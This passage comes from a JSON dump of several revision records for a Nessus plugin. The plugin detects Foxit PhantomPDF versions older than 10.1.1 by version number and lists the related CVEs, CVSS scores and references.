value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-02-18T10:51:45", "differentElements": ["cvss3", "sourceData"], "edition": 3}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "640abb864a167d07393ed42ddd849863e0ad9f9594719902b4635df75abc9885", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-02-20T10:49:41", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"modified": "2021-02-20T10:49:41", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-20T10:49:41", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-02-20T10:49:41", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "8299ce88fbadcbbf5e944e159a05252365ece422976a41cef1951f05c9a9934c", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-06-03T23:58:18", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"modified": "2021-06-03T23:58:18", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-06-03T23:58:18", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-06-03T23:58:18", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "dc5a0bc81a1452ff747d7a49a66e7318", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-07-29T00:04:22", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "cve", "idList": ["CVE-2020-13547", "CVE-2020-13570", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13557", "CVE-2020-13548"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1171", "TALOS-2020-1175", "TALOS-2020-1165"]}], "modified": "2021-07-29T00:04:22", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-07-29T00:04:22", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T00:04:22", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "151a5d7ffcf38286edb44da90df6a150", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-05T12:54:22", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "cve", "idList": ["CVE-2020-28203", "CVE-2020-13547", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1165", "TALOS-2020-1171", "TALOS-2020-1166"]}], "modified": "2021-08-05T12:54:22", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-08-05T12:54:22", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": [], "solution": "Upgrade to Foxit PhantomPDF version 10.1.1 or later", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:54:22", "differentElements": ["cpe"], "edition": 7}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "307396e5401f0493e97732c57eb7404b", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-06T13:28:51", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-13560", "CVE-2020-28203"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1171", "TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1166", "TALOS-2020-1165"]}], "modified": "2021-08-06T13:28:51", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-08-06T13:28:51", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n 